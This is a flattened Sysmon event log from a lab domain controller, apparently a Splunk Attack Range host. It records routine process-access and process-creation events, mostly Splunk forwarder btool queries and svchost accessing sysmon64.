13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003466Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003465Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.264{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003464Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003463Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+6665|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+17249|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+137ff|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+12176|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+19082|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d94e|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003462Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.263{59A5CD1D-8EE2-6005-A800-00000000A301}5096C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list httpServer --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{59A5CD1D-8EDF-6005-9E00-00000000A301}4728C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE" restart --waitonpid=2532 10341000x80000000000000003461Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:34.248{59A5CD1D-8EDF-6005-9E00-00000000A301}47284532C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE{59A5CD1D-8E56-6005-3000-00000000A301}2532C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101410C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+457e6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+460cb|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+453d6|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+d925|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\Splunk.EXE+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003725Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.983{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003724Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003723Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003722Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003721Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003720Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003719Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003718Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003717Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E44-6005-0500-00000000A301}640656C:\Windows\system32\csrss.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000003716Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003715Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003714Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-BC00-00000000A301}28324512C:\Program Files\SplunkUniversalForwarder\bin\btool.exe{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+239c|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2568|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+2926|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+11cf|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+1245|C:\Program Files\SplunkUniversalForwarder\bin\btool.exe+aa24|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000003713Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.981{59A5CD1D-8EE3-6005-BD00-00000000A301}4524C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe8.0.2splunkd servicesplunk ApplicationSplunk Inc.splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE" btool server list general --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exebtool server list general --no-log 10341000x80000000000000003712Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8EE3-6005-B500-00000000A301}28363856C:\Windows\system32\conhost.exe{59A5CD1D-8EE3-6005-BC00-00000000A301}2832C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003711Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003710Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003709Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003708Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003707Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003706Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:36:35.967{59A5CD1D-8E46-6005-0C00-00000000A301}596632C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000003705Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 